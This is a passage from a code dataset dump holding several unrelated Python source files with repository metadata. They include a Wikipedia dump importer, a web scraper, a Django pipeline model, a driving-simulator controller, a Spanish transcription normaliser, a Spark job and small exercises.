\"\n f\"exceeds length ({label_maximum_length})\")\n continue\n destination = link['destination']\n if len(destination) > title_maximum_length:\n print(f\"destination: '{destination[:title_maximum_length]}...' \"\n f\"exceeds maximum length ({title_maximum_length})\")\n continue\n\n data_ground_truth_decision = (\n article_id, line_id, link['start'], link['length'], label, destination, ground_truth_id)\n cursor.execute(sql_add_ground_truth_decisions, data_ground_truth_decision)\n db.commit() # commit after each article\n\n # main article processing loop\n articles_processed = 0\n stop_processing = False\n total_articles = sum(metadata['articles_counter'].values())\n with tqdm(total=total_articles) as pbar:\n for filename in dump_filenames:\n filepath = os.path.join(dump_path, filename)\n with open(filepath) as fp:\n for line in fp:\n article = json.loads(line)\n process_article(article)\n pbar.update(1)\n articles_processed += 1\n if early_stopping != -1 and articles_processed >= early_stopping:\n stop_processing = True\n break\n if stop_processing:\n break\n\n def step_2():\n print('step 2. saving labels...', end=' ')\n start = time.time_ns()\n sql_create_labels = '''INSERT INTO `labels` (`label`, `dump_id`, `counter`)\n SELECT `label`, `ground_truth_id`, COUNT(*) FROM `ground_truth_decisions` WHERE `ground_truth_id`=%s GROUP BY `label`'''\n cursor.execute(sql_create_labels, (ground_truth_id,))\n db.commit()\n elapsed = (time.time_ns() - start) / 1e9\n print(f'{elapsed:.2f} s')\n\n def step_3():\n print('step 3. updating ground_truth_decisions destination_ids...', end=' ')\n start = time.time_ns()\n sql_update_ground_truth_decisions= '''\n UPDATE `ground_truth_decisions` INNER JOIN `articles` ON `ground_truth_decisions`.`destination_title`=`articles`.`title`\n SET `ground_truth_decisions`.`destination_article_id` = `articles`.`id`\n WHERE `ground_truth_decisions`.`ground_truth_id`=%s AND `articles`.`dump_id`=%s'''\n cursor.execute(sql_update_ground_truth_decisions, (ground_truth_id, dump_id))\n db.commit()\n elapsed = (time.time_ns() - start) / 1e9\n print(f'{elapsed:.2f} s')\n\n def step_4():\n print('step 4. updating ground_truth_decisions label_ids...', end=' ')\n start = time.time_ns()\n sql_update_ground_truth_decisions = '''\n UPDATE `ground_truth_decisions` INNER JOIN `labels` ON `ground_truth_decisions`.`label`=`labels`.`label`\n SET `ground_truth_decisions`.`label_id` = `labels`.`id`\n WHERE `ground_truth_decisions`.`ground_truth_id`=%s AND `labels`.`dump_id`=%s'''\n cursor.execute(sql_update_ground_truth_decisions, (ground_truth_id, dump_id))\n db.commit()\n elapsed = (time.time_ns() - start) / 1e9\n print(f'{elapsed:.2f} s')\n\n def step_5():\n print('step 5. updating articles redirects...', end=' ')\n start = time.time_ns()\n sql_update_article_redirect = '''\n UPDATE `articles` `a1` INNER JOIN `articles` `a2` ON `a1`.`redirect_to_title`=`a2`.`title`\n SET `a1`.`caption`=`a2`.`caption`, `a1`.`redirect_to_id`=`a2`.`id`\n WHERE `a1`.`dump_id`=%s AND `a2`.`dump_id`=%s'''\n data_article_redirect = (dump_id, dump_id)\n cursor.execute(sql_update_article_redirect, data_article_redirect)\n db.commit()\n elapsed = (time.time_ns() - start) / 1e9\n print(f'{elapsed:.2f} s')\n\n def step_6():\n print('step 6. 
updating articles counters...', end=' ')\n start = time.time_ns()\n sql_update_article_counter = '''UPDATE `articles` INNER JOIN\n (SELECT `destination_title`, COUNT(*) AS `counter` FROM `ground_truth_decisions`\n WHERE `ground_truth_id`=%s GROUP BY `destination_title`) `wd1`\n ON `articles`.`title`=`wd1`.`destination_title`\n SET `articles`.`counter`=`wd1`.`counter`\n WHERE `articles`.`dump_id`=%s'''\n cursor.execute(sql_update_article_counter, (ground_truth_id, dump_id))\n db.commit()\n elapsed = (time.time_ns() - start) / 1e9\n print(f'{elapsed:.2f} s')\n\n def step_7():\n print('step 7. saving labels_articles...', end=' ')\n start = time.time_ns()\n sql_create_labels_articles = '''INSERT INTO `labels_articles` (`label_id`, `title`, `article_id`, `counter`)\n SELECT `wd`.`label_id`, `wd`.`destination_title`, `wd`.`destination_article_id`, COUNT(*)\n FROM `ground_truth_decisions` `wd`\n WHERE `wd`.`ground_truth_id`=%s\n GROUP BY `wd`.`label_id`, `wd`.`destination_title`, `wd`.`destination_article_id`'''\n cursor.execute(sql_create_labels_articles, (ground_truth_id,))\n db.commit()\n elapsed = (time.time_ns() - start) / 1e9\n print(f'{elapsed:.2f} s')\n\n def step_8():\n print('step 8. save articles count...', end=' ')\n start = time.time_ns()\n sql_update_articles_count = '''UPDATE `dumps` SET `articles_count`=\n (SELECT COUNT(*) FROM articles WHERE `dump_id`=%s AND `redirect_to_title` IS NULL)\n WHERE `id`=%s'''\n cursor.execute(sql_update_articles_count, (dump_id, dump_id))\n db.commit()\n elapsed = (time.time_ns() - start) / 1e9\n print(f'{elapsed:.2f} s')\n\n # apply selected steps\n for step in range(start_step, 9):\n locals()[f'step_{step}']()\n\n cursor.close()\n\n\ndef init_app(app):\n app.cli.add_command(import_enterprise_dump_command)\n","repo_name":"solewniczak/wikigold","sub_path":"src/wikigold/enterprisedump.py","file_name":"enterprisedump.py","file_ext":"py","file_size_in_byte":14057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32165651993","text":"\"\"\"\nCP1404 - Practicals\nEmails\n\"\"\"\n\n\ndef main():\n \"\"\"Create dictionary of emails to names\"\"\"\n email_to_name = {}\n email = str(input(\"Email: \"))\n while email != \"\":\n name = get_name_from_email(email).title()\n confirm = str(input(f\"Is your name {name}? 
(Y/n)\")).lower()\n if confirm != \"\" and confirm != \"y\":\n name = str(input(\"Name: \"))\n email_to_name[email] = name\n email = str(input(\"Email: \"))\n for key, value in email_to_name.items():\n print(f\"{value} ({key})\")\n\n\ndef get_name_from_email(email):\n \"\"\"Use string formatting to get name from email address\"\"\"\n name_part = email.split(\"@\")[0]\n names = name_part.split(\".\")\n name = \" \".join(names)\n return name\n\n\nmain()\n","repo_name":"taylor-stinson/cp1404practicals","sub_path":"prac_05/emails.py","file_name":"emails.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1102271737","text":"from sdb.scrapers.base_scraper import BaseScraper, ScraperConfig\n\nSuwayda24_Config = ScraperConfig(\n url_template=\"https://suwayda24.com/?cat=%2A&paged={page_num}\",\n publication=\"Suwayda 24\",\n should_get_metadata_during_pagination=False,\n)\n\n\nclass Suwayda24(BaseScraper):\n def __init__(self):\n self.config = Suwayda24_Config\n\n def get_all_articles(self, soup):\n \"\"\"Finds all articles on a single page\"\"\"\n\n articles = soup.find(\"div\", class_=\"post-listing archive-box\").find_all(\n \"article\"\n )\n return articles[:10]\n\n def get_article_title(self, article):\n \"\"\"Finds the title of an article\"\"\"\n\n return article.find(\"h2\", class_=\"post-box-title\").text\n\n def get_article_link(self, article):\n \"\"\"Finds the link of an article\"\"\"\n\n return article.find(\"h2\", class_=\"post-box-title\").find(\"a\").get(\"href\")\n\n def get_full_text_and_date_posted(self, article_link):\n \"\"\"Gets text and last updated date from article\"\"\"\n\n # bs4 setup\n soup = self.get_soup(url=article_link)\n\n # Get script w/ date object\n date_posted = soup.find(\"meta\", property=\"article:published_time\").get(\n \"content\"\n )\n\n # Identifies paragraphs and creates empty variable for text content\n paragraphs = soup.find(\"div\", class_=\"entry\").find_all(\"p\", recursive=False)\n full_text = \"\\n\\n\".join(paragraph.text for paragraph in paragraphs)\n\n return date_posted, full_text\n","repo_name":"jclark1913/syria-daily-brief","sub_path":"sdb/scrapers/suwayda24.py","file_name":"suwayda24.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"21353748618","text":"def cal():\n count = int(input())\n x = [int(input()) for _a in range(count)]\n for step in reversed(range(len(x))):\n max_index = 0\n for i in range(1, 1+step):\n if x[i] > x[max_index]:\n max_index = i\n x[max_index], x[step] = x[step], x[max_index]\n [print(a) for a in x]\n\n\ndef cal2():\n count = int(input())\n x = [int(input()) for _a in range(count)]\n print(list(reversed(sorted(x))))\n\n\nif __name__ == '__main__':\n cal()\n\n# reverse, reversed 또한 sort, sorted 랑 같은 형태이다.\n# 첫번째꺼는 반환x,이고 자기것을 바꾸는대신 두번째는 반환만 한다.\n","repo_name":"joonseolee/bundle-coding-test","sub_path":"boj/sort/Q2750.py","file_name":"Q2750.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72190357926","text":"import base64\r\nimport hashlib\r\nimport io\r\nimport os\r\nimport uuid\r\n\r\nfrom django.conf import settings\r\nfrom django.core.exceptions import ValidationError\r\nfrom django.core.files.base import ContentFile\r\nfrom django.core.files.storage import default_storage\r\nfrom 
django.core.validators import URLValidator\r\nfrom django.db import models\r\nimport celery\r\nimport magic\r\nimport mimetypes\r\nimport requests\r\n\r\nfrom core.json_schema.file import (\r\n check_is_internal_file,\r\n is_base64,\r\n)\r\nfrom core.models import WithDate\r\nfrom core.utils import random_uuid4\r\nfrom projects.models.project import Project\r\nfrom projects.models.processor import Processor\r\n\r\n\r\nclass Pipeline(WithDate, models.Model):\r\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\r\n project = models.ForeignKey(Project, on_delete=models.CASCADE)\r\n title = models.CharField(max_length=666, null=False, blank=False)\r\n description = models.TextField(blank=True, null=True)\r\n is_active = models.BooleanField(blank=True, default=True)\r\n processors = models.JSONField(null=True, blank=True)\r\n\r\n def __str__(self):\r\n return str(self.id)\r\n\r\n def check_is_internal_file(self, data):\r\n if not check_is_internal_file(data):\r\n _, is_opened = PipelineResult.open_file(data)\r\n if is_opened:\r\n return True\r\n else:\r\n return True\r\n return False\r\n\r\n def create_result(self, data):\r\n result_object = PipelineResult.objects.create(pipeline=self)\r\n\r\n if self.accepts_file() and self.check_is_internal_file(data):\r\n input_file = result_object.save_file(data)\r\n data = {\r\n \"id\": input_file.pk,\r\n }\r\n\r\n # Generate a task to queue processing\r\n celery.current_app.send_task(\r\n \"projects.tasks.process_pipeline\",\r\n kwargs={\r\n \"result_id\": result_object.pk,\r\n \"processors\": self.processors,\r\n \"data\": data,\r\n \"error\": None,\r\n },\r\n )\r\n\r\n return result_object\r\n\r\n def requires_input_data(self):\r\n first_processor = self.get_first_processor()\r\n if first_processor:\r\n return first_processor.requires_input()\r\n\r\n return False\r\n\r\n def get_first_processor(self):\r\n first_processor = None\r\n if self.processors and len(self.processors) > 0:\r\n first_processor = Processor.objects.get(pk=self.processors[0][\"id\"])\r\n\r\n return first_processor\r\n\r\n def check_input_data(self, data):\r\n first_processor = self.get_first_processor()\r\n if first_processor:\r\n first_processor.check_input_data(data)\r\n\r\n return\r\n\r\n def accepts_file(self):\r\n \"\"\"\r\n Helper for first processor input data type\r\n \"\"\"\r\n first_processor = self.get_first_processor()\r\n if first_processor:\r\n return first_processor.input_is_file()\r\n\r\n return False\r\n\r\n @classmethod\r\n def housekeeping(cls, conditions: models.Q = None, date_start=None, date_end=None):\r\n \"\"\"\r\n Mass Results cleanup\r\n \"\"\"\r\n if not conditions:\r\n conditions = models.Q()\r\n\r\n if date_start:\r\n conditions &= models.Q(ctime__gte=date_start)\r\n\r\n if date_end:\r\n conditions &= models.Q(ctime__lte=date_end)\r\n\r\n results = PipelineResult.objects.filter(conditions)\r\n for result in results:\r\n result.delete()\r\n\r\n def remove_results(self, date_start=None, date_end=None):\r\n \"\"\"\r\n Remove all Results and Associated Files\r\n older than some moment\r\n \"\"\"\r\n conditions = models.Q(pipeline=self)\r\n Pipeline.housekeeping(\r\n conditions=conditions, date_start=date_start, date_end=date_end\r\n )\r\n\r\n def delete(self):\r\n \"\"\"\r\n Remove all Results and Associated Files\r\n \"\"\"\r\n self.remove_results()\r\n\r\n super().delete()\r\n\r\n\r\nclass PipelineResult(models.Model):\r\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\r\n pipeline = 
models.ForeignKey(Pipeline, on_delete=models.CASCADE, editable=False)\r\n ctime = models.DateTimeField(null=True, blank=True, auto_now_add=True)\r\n error = models.JSONField(null=True, blank=True)\r\n result = models.JSONField(null=True, blank=True)\r\n is_finished = models.BooleanField(blank=True, default=False)\r\n\r\n def __str__(self):\r\n return str(self.id)\r\n\r\n def get_last_file(self):\r\n return PipelineResultFile.objects.filter(pipeline_result=self).last()\r\n\r\n def delete_unused_files(self):\r\n if not self.result:\r\n return\r\n\r\n for _file in PipelineResultFile.objects.filter(pipeline_result=self):\r\n if self.result.get(\"id\") != str(_file.id):\r\n _file.delete()\r\n\r\n def delete(self):\r\n for _file in PipelineResultFile.objects.filter(pipeline_result=self):\r\n _file.delete()\r\n\r\n super().delete()\r\n\r\n @classmethod\r\n def open_file(cls, data, raise_exception=False):\r\n input_file = None\r\n is_opened = False\r\n\r\n if check_is_internal_file(data):\r\n input_file = data\r\n is_opened = True\r\n elif isinstance(data, str):\r\n url_validator = URLValidator()\r\n\r\n # It may be a valid URL or base64 encoded string\r\n try:\r\n try:\r\n url_validator(data)\r\n response = requests.get(data)\r\n response.raise_for_status()\r\n input_file = io.BytesIO(response.content)\r\n is_opened = True\r\n except ValidationError:\r\n if is_base64(data):\r\n input_file = io.BytesIO(base64.b64decode(data))\r\n is_opened = True\r\n except Exception as e:\r\n if raise_exception:\r\n raise e\r\n input_file = data\r\n\r\n elif isinstance(data, dict):\r\n if \"id\" in data:\r\n try:\r\n _file = PipelineResultFile.objects.get(pk=data[\"id\"])\r\n input_file = _file.open()\r\n is_opened = True\r\n except Exception as e:\r\n if raise_exception:\r\n raise e\r\n input_file = data\r\n\r\n return input_file, is_opened\r\n\r\n def save_file(self, data):\r\n input_file = PipelineResultFile()\r\n input_file.prepare()\r\n\r\n converted_data, is_opened = PipelineResult.open_file(data)\r\n\r\n if self.pipeline.check_is_internal_file(data) and is_opened:\r\n default_storage.save(input_file.path, ContentFile(converted_data.read()))\r\n input_file.post_process(self)\r\n\r\n return input_file\r\n\r\n\r\nclass PipelineResultFile(models.Model):\r\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\r\n path = models.CharField(max_length=666, null=False, blank=False)\r\n extension = models.CharField(max_length=10, null=True, blank=True)\r\n pipeline_result = models.ForeignKey(\r\n PipelineResult, on_delete=models.CASCADE, editable=False\r\n )\r\n md5_hash = models.CharField(max_length=64, editable=False)\r\n size = models.BigIntegerField(default=0)\r\n mimetype = models.CharField(max_length=666, null=True, blank=True)\r\n ctime = models.DateTimeField(null=True, blank=True, auto_now_add=True)\r\n\r\n _saved = False\r\n\r\n def __str__(self):\r\n return str(self.id)\r\n\r\n @classmethod\r\n def remove_by_id(cls, file_id: dict = None):\r\n if not file_id:\r\n return\r\n\r\n file_path = os.path.join(settings.MEDIA_ROOT, file_id)\r\n if os.path.exists(file_path):\r\n os.remove(file_path)\r\n\r\n def delete(self):\r\n if os.path.exists(self.path):\r\n os.remove(self.path)\r\n\r\n super().delete()\r\n\r\n def prepare(self, *args, **kwargs):\r\n self.id = random_uuid4()\r\n self.path = os.path.join(settings.MEDIA_ROOT, self.id)\r\n\r\n if os.path.isfile(self.path):\r\n self._saved = True\r\n\r\n def post_process(self, pipeline_result):\r\n hash_md5 = hashlib.md5()\r\n\r\n if not 
self._saved:\r\n with open(self.path, \"rb\") as f:\r\n for chunk in iter(lambda: f.read(4096), b\"\"):\r\n hash_md5.update(chunk)\r\n\r\n f.seek(0, os.SEEK_END)\r\n self.size = f.tell()\r\n\r\n \"\"\"\r\n Possible Vulnerability:\r\n\r\n * Worker may set file's `mimetype`\r\n \"\"\"\r\n if not self.mimetype:\r\n try:\r\n mime = magic.Magic(mime=True)\r\n self.mimetype = mime.from_file(self.path)\r\n except Exception as e:\r\n pass\r\n\r\n if self.mimetype:\r\n self.extension = mimetypes.guess_extension(self.mimetype)\r\n\r\n if self.extension:\r\n if not self.path.endswith(self.extension):\r\n old_path = self.path\r\n self.path = self.path + self.extension\r\n\r\n os.rename(old_path, self.path)\r\n\r\n self.md5_hash = hash_md5.hexdigest()\r\n self.pipeline_result = pipeline_result\r\n self.save()\r\n self._saved = True\r\n\r\n def open(self):\r\n return open(self.path, \"rb\")\r\n\r\n def write(self, data):\r\n with open(self.path, \"wb\") as e:\r\n e.write(data)\r\n","repo_name":"firewut/data-transform-pipelines-api","sub_path":"src/projects/models/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":9628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37760787603","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 30 11:55:05 2019\n\n@author: AI & ML\n\"\"\"\nimport numpy as np\nimport socketio#for integrating with gain using server.\nimport eventlet\nfrom flask import Flask\nfrom keras.models import load_model#it is used for loading the model in the enviroment\nimport base64\nfrom io import BytesIO#these are used for working with images.\nfrom PIL import Image\nimport cv2\n\nsio = socketio.Server()#used for creating the server.\n\napp = Flask(__name__) #'__main__'#used for handling pourpose.\n\nspeed_limit = 30#for speed limit of the car.\n\ndef img_preprocess(img):\n img = img[60:135,:,:]\n img = cv2.cvtColor(img,cv2.COLOR_RGB2YUV)\n img = cv2.GaussianBlur(img, (3,3),0)\n img = cv2.resize(img,(200,66))\n img = img/255\n \n return img\n\n\n\n@sio.on('telemetry')#send signal to your gain.\n\ndef telemetry(sid, data):\n speed = float(data['speed'])\n image = Image.open(BytesIO(base64.b64decode(data['image'])))#take image from gain.\n image = np.asarray(image)\n image = img_preprocess(image)\n image = np.array([image])\n steering_angle = float(model.predict(image))#predicting the steering angle.\n throttle = 1.0 - speed/speed_limit#predicting the throttle.\n print('{} {} {}'.format(steering_angle, throttle,speed))\n send_control(steering_angle,throttle)#sending the command.\n\n@sio.on('connect')#message, disconnect#used for connecting the gain\n\ndef connect(sid, environ):\n print('connected')\n send_control(0,0)\n \ndef send_control(steering_angle,throttle):#using telementry send the image\n sio.emit('steer',data={\n 'steering_angle':steering_angle.__str__(),\n 'throttle':throttle.__str__()\n })\n \n\nif __name__=='__main__':#loading the model which we have downloaded from google colab.\n model = load_model(r\"D:\\Courses\\AI & ML\\beta_simulator_windows\\training data\\model.h5\")\n app = socketio.Middleware(sio,app)#for creating the tunnel in between.\n eventlet.wsgi.server(eventlet.listen(('',4567)),app)#used for code forwarding.\n","repo_name":"raviroushan/self_driving_car","sub_path":"drive.py","file_name":"drive.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 
+{"seq_id":"39941185757","text":"#!/usr/bin/env python\n# vim: set fileencoding=utf-8 fdm=marker :\n\"\"\"\nThis module provides tools for **ENGLISH** normalisation of transcriptions, mainly for\nthose obtained from human transcribers.\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport re\n\n__all__ = ['normalise_text', 'exclude', 'exclude_by_dict']\n\n_nonspeech_events = ['_SIL_', '_INHALE_', '_LAUGH_', '_EHM_HMM_', '_NOISE_', '_EXCLUDE_',]\n\nfor idx, ne in enumerate(_nonspeech_events):\n _nonspeech_events[idx] = (re.compile(r'((\\b|\\s){pat}(\\b|\\s))+'.format(pat=ne)), ' '+ne+' ')\n\n# nonspeech event transcriptions {{{\n_nonspeech_map = {\n '_SIL_': (\n '(SIL)',\n '(SILENCE)',\n '(QUIET)',\n '(CLEARING)',\n '',\n ),\n '_INHALE_': (\n '(INHALE)',\n '(BREATH)',\n '(BREATHING)',\n '(SNIFFING)',\n '',\n ),\n '_LAUGH_': (\n '(LAUGH)',\n '(LAUGHING)',\n '',\n ),\n '_EHM_HMM_': (\n '(EHM_HMM)',\n '(HESITATION)',\n '(HUM)',\n '',\n '',\n '',\n '',\n '',\n '',\n ),\n '_NOISE_': (\n '(NOISE)',\n '(NOISES)',\n '(COUCHING)',\n '(COUGH)',\n '(COUGHING)',\n '(LIPSMACK)',\n '(POUNDING)',\n '(RING)',\n '(RINGING)',\n '(INTERFERENCE)',\n '(KNOCKING)',\n '(BANG)',\n '(BANGING)',\n '(BACKGROUNDNOISE)',\n '(BABY)',\n '(BARK)',\n '(BARKING)',\n '(NOISE)',\n '(NOISES)',\n '(STATIC)',\n '(SCRAPE)',\n '(SQUEAK)',\n '(TVNOISE)',\n '',\n ),\n '_EXCLUDE_': (\n '(EXCLUDE)',\n '(PERSONAL)',\n '(VULGARISM)',\n '(UNINTELLIGIBLE)',\n '(UNINT)',\n )\n}\n#}}}\n_nonspeech_trl = dict()\nfor uscored, forms in _nonspeech_map.iteritems():\n for form in forms:\n _nonspeech_trl[form] = uscored\n\n# substitutions {{{\n_subst = [\n ('_EXCLUDE_', '_EXCLUDE_'),\n ('ACUESTATE', 'ACUÉSTATE'),\n ('ALÓ', 'HALÓ'),\n ('AYUDAME', 'AYÚDAME'),\n ('BIOLOGIA', 'BIOLOGÍA'),\n ('CIENTIFICOS', 'CIENTÍFICOS'),\n ('DEMAS', 'DEMÁS'),\n ('FISCALIA', 'FISCALÍA'),\n ('GANACIA', 'GANANCIA'),\n ('GARABOA', 'GARAGOA'),\n ('INJUSTSICIA', 'INJUSTICIA'),\n ('INMANULADA', 'INMACULADA'),\n ('UDSTED', 'USTED'),\n# ('', ''),\n ]\n#}}}\nfor idx, tup in enumerate(_subst):\n pat, sub = tup\n _subst[idx] = (re.compile(r'(^|\\s){pat}($|\\s)'.format(pat=pat)), ' '+sub+' ')\n\n# hesitation expressions {{{\n_hesitation = ['AAAA', 'AAA', 'AA', 'AAH', 'A-', \"-AH-\", \"AH-\", \"AH.\", \"AH\",\n \"AHA\", \"AHH\", \"AHHH\", \"AHMA\", \"AHM\", \"ANH\", \"ARA\", \"-AR\",\n \"AR-\", \"-AR\", \"ARRH\", \"AW\", \"EA-\", \"-EAR\", \"-EECH\", \"\\\"EECH\\\"\",\n \"-EEP\", \"-E\", \"E-\", \"EH\", \"EM\", \"--\", \"ER\", \"ERM\", \"ERR\",\n \"ERRM\", \"EX-\", \"F-\", \"HM\", \"HMM\", \"HMMM\", \"-HO\", \"HUH\", \"HU\",\n \"HUM\", \"HUMM\", \"HUMN\", \"HUMN\", \"HUMPH\", \"HUP\", \"HUU\", \"-\",\n \"MM\", \"MMHMM\", \"MMM\", \"NAH\", \"OHH\", \"OH\", \"SH\", \"UHHH\", \"EMMM\"\n \"UHH\", \"UHM\", \"UH'\", \"UH\", \"UHUH\", \"UHUM\", \"UMH\", \"UMM\", \"UMN\",\n \"UM\", \"URM\", \"URUH\", \"UUH\", \"ARRH\", \"AW\", \"EM\", \"ERM\", \"ERR\",\n \"ERRM\", \"HUMN\", \"UM\", \"UMN\", \"URM\", \"AH\", \"ER\", \"ERM\", \"HUH\",\n \"HUMPH\", \"HUMN\", \"HUM\", \"HU\", \"SH\", \"UH\", \"UHUM\", \"UM\", \"UMH\",\n \"URUH\", \"MMMM\", \"MMM\", \"OHM\", \"UMMM\", \"MHMM\", \"EMPH\", \"HMPH\",\n \"UGH\", \"UHH\", \"UMMMMM\", \"SHH\", \"OOH\", ]\n# }}}\nfor idx, word in enumerate(_hesitation):\n _hesitation[idx] = re.compile(r'(^|\\s){word}($|\\s)'.format(word=word))\n\n_more_spaces = re.compile(r'\\s{2,}')\n_sure_punct_rx = re.compile(r'[.?!\",_\\n]')\n_parenthesized_rx = re.compile(r'\\(+([^)]*)\\)+')\n\n\ndef normalise_text(text):\n \"\"\"\n Normalises the transcription. 
This is the main function of this module.\n \"\"\"\n text = _sure_punct_rx.sub(' ', text)\n text = text.strip().upper()\n\n # Do dictionary substitutions.\n for pat, sub in _subst:\n text = pat.sub(sub, text)\n for word in _hesitation:\n text = word.sub(' (HESITATION) ', text)\n text = _more_spaces.sub(' ', text).strip()\n \n # Handle non-speech events (separate them from words they might be\n # agglutinated to, remove doubled parentheses, and substitute the known\n # non-speech events with the forms with underscores).\n #\n # This step can incur superfluous whitespace.\n if '(' in text or '<' in text:\n text = _parenthesized_rx.sub(r' (\\1) ', text)\n for parenized, uscored in _nonspeech_trl.iteritems():\n text = text.replace(parenized, uscored)\n text = _more_spaces.sub(' ', text.strip())\n\n # remove duplicate non-speech events\n for pat, sub in _nonspeech_events:\n text = pat.sub(sub, text)\n text = _more_spaces.sub(' ', text).strip()\n\n for char in '^':\n text = text.replace(char, '')\n\n return text\n\n_excluded_characters = set(['\\n', '=', '-', '*', '+', '~', '(', ')', '[', ']', '{', '}', '<', '>',\n '0', '1', '2', '3', '4', '5', '6', '7', '8', '9'])\n\ndef exclude_asr(text):\n \"\"\"\n This function is used for determining whether the transcription can be used for training ASR.\n\n Determines whether `text' is not good enough and should be excluded.\n \"Good enough\" is defined as containing none of `_excluded_characters' and being\n longer than one word.\n \"\"\"\n if '_EXCLUDE_' in text:\n return True\n\n if text in ['_SIL_', ]:\n return True\n\n if text in ['_NOISE_', '_EHM_HMM_', '_INHALE_', '_LAUGH_']:\n return False\n\n # allow for sentences with these non-speech events if mixed with text\n for s in ['_NOISE_', '_INHALE_', '_LAUGH_']:\n text = text.replace(s,'')\n\n for char in _excluded_characters:\n if char in text:\n return True\n if '_' in text:\n return True\n\n if len(text) < 2:\n return True\n\n return False\n\ndef exclude_lm(text):\n \"\"\"\n This function is used for determining whether the transcription can be used for Language Modeling.\n\n Determines whether `text' is not good enough and should be excluded.\n \"Good enough\" is defined as containing none of `_excluded_characters' and being\n longer than one word.\n \"\"\"\n\n if '_EXCLUDE_' in text:\n return True\n\n for char in _excluded_characters:\n if char in text:\n return True\n\n return False\n\ndef exclude_slu(text):\n \"\"\"\n This function is used for determining whether the transcription can be used for training Spoken Language Understanding.\n \"\"\"\n return exclude_lm(text)\n\ndef exclude_by_dict(text, known_words):\n \"\"\"\n Determines whether text is not good enough and should be excluded.\n\n \"Good enough\" is defined as having all its words present in the\n `known_words' collection.\"\"\"\n return not all(map(lambda word: word in known_words, text.split()))\n","repo_name":"UFAL-DSG/alex","sub_path":"alex/corpustools/text_norm_es.py","file_name":"text_norm_es.py","file_ext":"py","file_size_in_byte":7042,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"52"} +{"seq_id":"11610522712","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/9/24 11:38\n# @Author : XiaTian\n# @File : 1、WEB基础介绍.py\n\nfrom socket import *\n\nserver = socket()\nserver.bind(('127.0.0.1',8080))\nserver.listen(5)\n\nwhile True:\n conn,addr = server.accept()\n data = conn.recv(1024)\n print(data)\n\n with open('login.html','r') as f:\n sendd = f.read()\n\n conn.send(('http/1.1 200 
OK\\r\\n\\r\\n%s'%sendd).encode('utf8'))\n conn.close()\n","repo_name":"summer5625/Mygit","sub_path":"第六模块_WEB框架/Django框架/1、WEB基础介绍.py","file_name":"1、WEB基础介绍.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26863196708","text":"from pyspark import SparkContext\n\nif __name__ == \"__main__\":\n sc = SparkContext.getOrCreate()\n business_l = sc.textFile(\"dataset/business.csv\").map(lambda x: x.split(\"::\")).filter(lambda x: \"NY\" in x[1])\n review_l = sc.textFile(\"dataset/review.csv\").map(lambda x: x.split(\"::\"))\n business_set = business_l.map(lambda x: (x[0], x[1] + \" \" + x[2]))\n\n sum_rating = review_l.map(lambda a: (a[2], float(a[3]))).reduceByKey(lambda a, b: a + b).partitionBy(1)\n count_rating = review_l.map(lambda a: (a[2], 1)).reduceByKey(lambda a, b: a + b).partitionBy(1)\n\n join_result = sum_rating.join(count_rating)\n rating_avg = join_result.map(lambda a: (a[0], a[1][0] / a[1][1]))\n\n result_final = business_set.join(rating_avg).distinct(1).sortBy(lambda a: a[1][1], ascending=False)\n result_final.saveAsTextFile(\"Output/TopTenBusinessOutput\")\n print(result_final.top(10))\n sc.stop()\n","repo_name":"sankalpbhandari/SparkMapReduce","sub_path":"TopTenBusiness.py","file_name":"TopTenBusiness.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"75393821603","text":"import numpy as np\nimport random\nimport pandas as pd\nfrom port_inventory import *\nimport itertools\nimport cProfile, pstats, io\nfrom numba import njit, jit\nimport gc, os\nimport matplotlib.pyplot as plt\n\n\n#Slow\ndef make_ret_mat(port, tickers):\n day_ret_mat = []\n ann_rets = []\n for tick in tickers:\n day_ret_mat.append(np.array(port.holdings[tick].daily_ret)[1:]*100)\n ann_rets.append(get_ann_ret(port.holdings[tick].daily_ret))\n\n day_ret_mat = np.array(day_ret_mat)\n ann_rets = np.array(ann_rets).transpose()\n \n return day_ret_mat, ann_rets\n\n\ndef get_ann_ret(ret_list):\n ret_list = [x+1 for x in ret_list]\n ret = np.nanprod(ret_list)-1\n return ret*100\n\n\ndef weight_cov(weights):\n return [weights, np.outer(weights, weights)]\n\n\ndef create_weights(num_in_port, iters):\n weights = []\n l, h = [1, 2]\n for i in range(0, int(iters * .8)):\n group_1 = [random.uniform(0, 1) for x in range(0, num_in_port)]\n weights.append([group_1[x] / sum(group_1) for x in range(0, len(group_1))])\n for i in range(int(iters * .8), int(iters * .9)):\n group_2 = [random.uniform(l, h) for x in [1]] + [random.uniform(0, 1) for x in range(0, num_in_port - 1)]\n weights.append([group_2[x] / sum(group_2) for x in range(0, len(group_2))])\n for i in range(int(iters * .9), int(iters)):\n group_3 = [random.uniform(l, h) for x in [1, 2]] + [random.uniform(0, 1) for x in range(0, num_in_port - 2)]\n weights.append([group_3[x] / sum(group_3) for x in range(0, len(group_3))])\n\n weights = np.array([np.array(l) for l in weights])\n\n return [*map(weight_cov, weights)]\n\n\ndef create_weights_w_allo(num_in_port, iters, given_weights):\n allos = 